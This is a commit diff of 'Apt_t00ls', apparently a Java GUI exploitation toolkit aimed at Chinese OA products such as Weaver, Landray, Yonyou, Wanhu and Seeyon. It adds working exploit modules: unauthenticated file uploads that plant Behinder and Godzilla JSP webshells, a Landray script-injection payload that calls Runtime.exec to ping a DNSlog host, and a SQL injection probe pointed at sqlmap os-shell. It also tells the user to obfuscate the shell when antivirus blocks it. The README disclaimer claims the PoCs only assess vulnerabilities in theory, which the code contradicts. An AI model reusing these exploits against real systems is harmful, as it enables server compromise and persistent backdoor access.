0.2

Author: White-hua

README.md

@@ -1,5 +1,11 @@
 # Apt_t00ls
 高危漏洞利用工具
+---  
+
+## 开心指数
+
+[![Stargazers over time](https://starchart.cc/White-hua/Apt_t00ls.svg)](https://starchart.cc/White-hua/Apt_t00ls)
+
 ---
 泛微:  
 e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)  
@@ -19,11 +25,17 @@ landray_sysSearchMain-RCE (多个payload，写入哥斯拉 3.03 密码 yes)
 yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)  
 yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)  
 yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)  
-yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)
+yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)  
+yongyou_GRP_UploadFileData-RCE(默认写入冰蝎4.0.3aes)  
 
 万户：  
 wanhuoa_OfficeServer-RCE(默认写入冰蝎4.0.3aes)    
 wanhuoa_OfficeServer-RCE(默认写入哥斯拉4.0.1 jsp aes 默认密码密钥)  
+wanhuoa_DocumentEdit-SQlli(mssql数据库 可 os-shell)  
+wanhuoa_fileUploadController-RCE(默认写入冰蝎4.0.3aes)  
+
+致远：  
+zhiyuanoa_main_log4j2-RCE (仅支持检测，自行开启ladp服务利用)  
 
 中间件:  
 IIS_PUT_RCE (emm暂时没办法getshell  仅支持检测 java没有MOVE方法)  
@@ -59,5 +71,15 @@ Tasklist敏感进程检测
 
 ![my](https://user-images.githubusercontent.com/100954709/193801691-df73fec6-284a-450a-943a-09fe023bcde0.png)  
 
+---
+## 免责声明
+本工具仅面向合法授权的企业安全建设行为，如您需要测试本工具的可用性，请自行搭建靶机环境。
+
+为避免被恶意使用，本项目所有收录的poc均为漏洞的理论判断，不存在漏洞利用过程，不会对目标发起真实攻击和漏洞利用。
+
+在使用本工具进行检测时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。请勿对非授权目标进行扫描。
+
+如您在使用本工具的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。
 
+在安装并使用本工具前，请您务必审慎阅读、充分理解各条款内容，限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。 除非您已充分阅读、完全理解并接受本协议所有条款，否则，请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的，即视为您已阅读并同意本协议的约束
 

src/main/java/Controller/AttController.java

@@ -207,12 +207,19 @@ public void initialize() {
     textArea_info.appendText("\nlandray_treexmlTmpl-RCE (可直接执行系统命令)");
     textArea_info.appendText("\nlandray_datajson-RCE (可直接执行系统命令)");
 
+    textArea_info.appendText("\n\nwanhu_OfficeServer-RCE (可直接执行系统命令)");
+    textArea_info.appendText("\nwanhu_smartUpload-RCE (可直接执行系统命令)");
+    textArea_info.appendText("\nwanhu_DocumentEdit-SQlli (mssql数据库 可 os-shell)");
+
     textArea_info.appendText(
         "\n\nyongyou_chajet-RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
     textArea_info.appendText("\nyongyou_NC_bsh.servlet.BshServlet-RCE (可直接执行系统命令)");
     textArea_info.appendText(
         "\nyongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)");
     textArea_info.appendText("\nyongyou_NC_FileReceiveServlet-RCE (默认写入冰蝎4.0.3aes)");
+    textArea_info.appendText("\nyongyou_GRP_UploadFileData-RCE (默认写入冰蝎4.0.3aes)");
+
+    textArea_info.appendText("\n\nzhiyuanoa_main_log4j2-RCE (仅支持检测)");
 
     textArea_info.appendText(
         "\n\nIIS_PUT_RCE (emm暂时没办法getshell  仅支持检测 java没有MOVE方法)");
@@ -292,6 +299,12 @@ private void updateListView(String selectedItem) {
       case "用友-OA":
         choiceBox_exp.setItems(exp.yongyouoa());
         break;
+      case "万户-OA":
+        choiceBox_exp.setItems(exp.wanhuoa());
+        break;
+      case "致远-OA":
+        choiceBox_exp.setItems(exp.zhiyuanoa());
+        break;
       case "IIS":
         choiceBox_exp.setItems(exp.iis());
         break;

src/main/java/Controller/TsklistController.java

@@ -5,7 +5,9 @@
 import javafx.scene.control.Button;
 import javafx.scene.control.TextArea;
 import javafx.scene.input.MouseEvent;
+
 import java.io.UnsupportedEncodingException;
+import java.nio.charset.StandardCharsets;
 import java.util.HashMap;
 import java.util.Map;
 
@@ -21,8 +23,8 @@ public class TsklistController {
 
     @FXML
     void clicked_check(MouseEvent event) {
-        String tasklist =textArea_check.getText();
-        Map<String,String> exelist = new HashMap<String,String>();
+        String tasklist = textArea_check.getText();
+        Map<String, String> exelist = new HashMap<String, String>();
         String[] exetestlist = shell.readFileByLines(shell.tasklistpath);
         for (String str : exetestlist)
             if (str != null) {
@@ -32,7 +34,7 @@ void clicked_check(MouseEvent event) {
         String[] resultlist22;
         resultlist22 = shell.taskexechange(resultlist2);
         String finallist = shell.ifexe(resultlist22, exelist);
-        String res = null;
+        String res;
         try {
             res = new String(finallist.getBytes("gbk"));
             textArea_res.setText(res);

src/main/java/Exp/OA/landrayoa/landray_datajson.java

@@ -22,26 +22,17 @@ public Boolean getshell(String url, TextArea textArea) {
     }
 
     private Boolean att(String url,TextArea textArea){
+        String dnslog = shell.readFile(shell.dnspath).replace("http://","").replace("/","");
         String dnspath = shell.readFile(shell.dnspath).replace("http://","");
-        String replace = dnspath.replace("/", "");
-        String payload = "?s_bean=sysFormulaSimulateByJS&script=function%20test(){%20return%20java.lang.Runtime};r=test();r.getRuntime().exec(\"ping%20" + replace + "\")&type=1";
-        Response dns_le1 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
-        int dns_1 = dns_le1.getText().length();
-
+        String payload = "/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test()%7B%20return%20java.lang.Runtime%7D;r=test();r.getRuntime().exec(%22ping%20-c%204%20" + shell.getRandomString() + "." + dnslog+"%22)&type=1";
         Response response = HttpTools.get(url + payload, new HashMap<String, String>(), "utf-8");
-
-        try { Thread.sleep (5000) ;
-        } catch (Exception ie){}
-
-        Response dns_le2 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
-        int dns_2 = dns_le2.getText().length();
-
-        if(dns_2 > dns_1){
-            textArea.appendText("\n漏洞存在-收到dnslog回显  \n " + url + payload + "\n");
+        if(response.getCode() == 200 && response.getText().contains("success")){
+            textArea.appendText("\n漏洞存在 请自行利用\n" + url + payload);
             return true;
         }else {
-            textArea.appendText("\nlandray_datajson-RCE-漏洞不存在 (出现误报请联系作者)");
             return false;
         }
+
+
     }
 }

src/main/java/Exp/OA/wanhuoa/wanhu_DocumentEdit.java

@@ -0,0 +1,34 @@
+package Exp.OA.wanhuoa;
+
+import Utilss.HttpTools;
+import Utilss.Response;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+
+import java.util.HashMap;
+
+public class wanhu_DocumentEdit implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean att = att(url, textArea);
+        return att;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        textArea.appendText("\n 请自行使用sqlmap或手动利用");
+        return false;
+    }
+
+    private Boolean att(String url,TextArea textArea){
+        Response response = HttpTools.get(url + "/defaultroot/public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains("iSignature")){
+            textArea.appendText("\n 漏洞存在 请使用Sqlmap利用 若存在waf 请手动绕过 \n " + url + "/defaultroot/public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1");
+            textArea.appendText("\n 该OA所用 mssql数据库 可进行 os-shell");
+            return true;
+        }else {
+            textArea.appendText("wanhuoa_DocumentEdit-SQLli-漏洞不存在 (出现误报请联系作者)");
+            return false;
+        }
+    }
+}

src/main/java/Exp/OA/wanhuoa/wanhuoa_fileUploadController.java

@@ -0,0 +1,87 @@
+package Exp.OA.wanhuoa;
+
+import Utilss.HttpTools;
+import Utilss.Response;
+import Utilss.shell;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+
+import java.util.HashMap;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+public class wanhuoa_fileUploadController implements Exploitlnterface {
+    private String filename;
+
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean att = att(url, textArea);
+        return att;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        Boolean shell = shell(url, textArea);
+        return shell;
+    }
+
+    private Boolean att(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0");
+        String post = "--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0\r\nContent-Disposition: form-data; name=\"file\"; filename=\"nishizhu.txt\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n" + shell.test_payload + "\r\n--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--";
+
+        Response post1 = HttpTools.post(url + "/defaultroot/upload/fileUpload.controller", post, head, "utf-8");
+        if(post1.getCode() == 200 && post1.getText().contains("success")){
+            //使用正则表达式抓取
+            Pattern pattern = Pattern.compile("\\d+.txt");
+            Matcher matcher = pattern.matcher(post1.getText().trim());
+            while (matcher.find()) {
+                filename = matcher.group();
+                break;
+            }
+            Response response = HttpTools.get(url + "/defaultroot/upload/html/" + filename, new HashMap<String, String>(), "utf-8");
+            if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/defaultroot/upload/html/" + filename);
+                return true;
+            }else {
+                textArea.appendText("\n wanhuoa_fileUploadController-RCE-漏洞不存在 (出现误报请联系作者)");
+                return false;
+            }
+
+        }else {
+            textArea.appendText("\n wanhuoa_fileUploadController-RCE-漏洞不存在 (出现误报请联系作者)");
+            return false;
+        }
+    }
+
+    private Boolean shell(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0");
+        String post = "--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0\r\nContent-Disposition: form-data; name=\"file\"; filename=\"nishizhu.jsp\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n" + shell.readFile(shell.Jsppath) + "\r\n--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--";
+
+        Response post1 = HttpTools.post(url + "/defaultroot/upload/fileUpload.controller", post, head, "utf-8");
+        if(post1.getCode() == 200 && post1.getText().contains("success")){
+            //使用正则表达式抓取
+            Pattern pattern = Pattern.compile("\\d+.jsp");
+            Matcher matcher = pattern.matcher(post1.getText().trim());
+            while (matcher.find()) {
+                filename = matcher.group();
+                break;
+            }
+            Response response = HttpTools.get(url + "/defaultroot/upload/html/" + filename, new HashMap<String, String>(), "utf-8");
+            if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                textArea.appendText("\n 漏洞存在 webshell文件写入成功\n " + url + "/defaultroot/upload/html/" + filename);
+                return true;
+            }else {
+                textArea.appendText("\n shell写入失败 请手动查看 ");
+                return false;
+            }
+
+        }else {
+            textArea.appendText("\n 疑似杀软查杀！！请进行免杀！！");
+            return false;
+        }
+    }
+
+
+}

src/main/java/Exp/OA/wanhuoa/wanhuoa_smartUpload.java

@@ -80,7 +80,7 @@ private Boolean shell(String url,TextArea textArea){
                 "Content-Disposition: form-data; name=\"photo\"; filename=\"nishizhu.jsp\"\r\n" +
                 "Content-Type: text/plain\r\n" +
                 "\r\n" +
-//                shell.readFile(shell.Gsljsppath)  + "\r\n" +
+                shell.readFile(shell.Gsljsppath)  + "\r\n" +
                 "------WebKitFormBoundaryDUKz5M3eZoU6nAcO\r\n" +
                 "Content-Disposition: form-data; name=\"continueUpload\"\r\n" +
                 "\r\n" +

src/main/java/Exp/OA/weaveroa/weaveroa_eoffice10_OfficeServer.java

@@ -17,7 +17,7 @@ public Boolean checkVul(String url, TextArea textArea) {
 
     @Override
     public Boolean getshell(String url, TextArea textArea) {
-        Boolean att = att(url,textArea,"nishizhu.jsp",shell.Phppath);
+        Boolean att = att(url,textArea,"nishizhu.php",shell.Phppath);
         return att;
     }
 

src/main/java/Exp/OA/weaveroa/weaveroa_workrelate_uploadOperation.java

@@ -6,36 +6,29 @@
 import cn.hutool.core.util.StrUtil;
 import core.Exploitlnterface;
 import javafx.scene.control.TextArea;
+
 import java.util.HashMap;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
 
-public class weaveroa_workrelate_uploadOperation implements Exploitlnterface{
-    private HashMap<String,String> headers = new HashMap<>();
+public class weaveroa_workrelate_uploadOperation implements Exploitlnterface {
+    private HashMap<String, String> headers = new HashMap<>();
     private String fileid = "";
 
     @Override
     public Boolean checkVul(String str, TextArea textArea) {
-        Boolean att = this.att(str, shell.Testpath, textArea,"nishizhu.txt");
+        Boolean att = this.att(str, shell.Testpath, textArea, "nishizhu.txt");
         return att;
     }
 
     @Override
     public Boolean getshell(String str, TextArea textArea) {
-        Boolean att = this.att(str, shell.Jsppath, textArea,"nishizhu.jsp");
+        Boolean att = this.att(str, shell.Jsppath, textArea, "nishizhu.jsp");
         return att;
     }
 
-    private Boolean att(String url,String path,TextArea textArea,String filename){
-        String color="-fx-text-fill: black";
-        if (StrUtil.isBlank(url)){
-            textArea.appendText("请填写URL！！！");
-           color="-fx-text-fill: red";
-            textArea.setStyle(color+"; -fx-font-size: 16px;");
-            throw new RuntimeException("URL 不存在");
-        }
-      textArea.setStyle(color+"; -fx-font-size: 16px;");
-        this.headers.put("Content-Type","multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
+    private Boolean att(String url, String path, TextArea textArea, String filename) {
+        this.headers.put("Content-Type", "multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
         String fir_post = "------WebKitFormBoundarymVk33liI64J7GQaK\r\n" +
                 "Content-Disposition: form-data; name=\"secId\"\r\n" +
                 "\r\n" +
@@ -53,7 +46,7 @@ private Boolean att(String url,String path,TextArea textArea,String filename){
         Response post = HttpTools.post(url + "/workrelate/plan/util/uploaderOperate.jsp", fir_post, headers, "utf-8");
 
 
-        if(post.getCode() == 200 && post.getText().contains("&fileid=")){
+        if (post.getCode() == 200 && post.getText().contains("&fileid=")) {
 
             textArea.appendText("\n fileid获取成功 开始释放");
             //使用正则表达式抓取filedid
@@ -72,26 +65,26 @@ private Boolean att(String url,String path,TextArea textArea,String filename){
                     "------WebKitFormBoundarymVk33liI64J7GQaK--";
 
             Response sec = HttpTools.post(url + "/OfficeServer", sec_post, this.headers, "utf-8");
-            if(sec.getCode() == 200 && sec.getText().contains(shell.test_payload)){
+            if (sec.getCode() == 200 && sec.getText().contains(shell.test_payload)) {
 
                 textArea.appendText("\n 释放成功 检测写入状态");
                 Response thired = HttpTools.get(url + "/" + filename, new HashMap<String, String>(), "utf-8");
 
-                if(thired.getText().contains(shell.test_payload)){
+                if (thired.getText().contains(shell.test_payload)) {
                     textArea.appendText("\n 漏洞存在，测试文件写入成功 \n " + url + "/" + filename);
                     return true;
-                }else {
+                } else {
                     textArea.appendText("\n 漏洞可能存在，疑似WAF拦截，请手动复现");
                     return false;
                 }
 
-            }else {
+            } else {
                 textArea.appendText("\n 漏洞可能存在，疑似WAF拦截，请手动复现");
                 return false;
             }
 
 
-        }else {
+        } else {
             textArea.appendText("\n weaveroa_workrelate_uploadOperation - 漏洞不存在 (出现误报请联系作者)");
             return false;
         }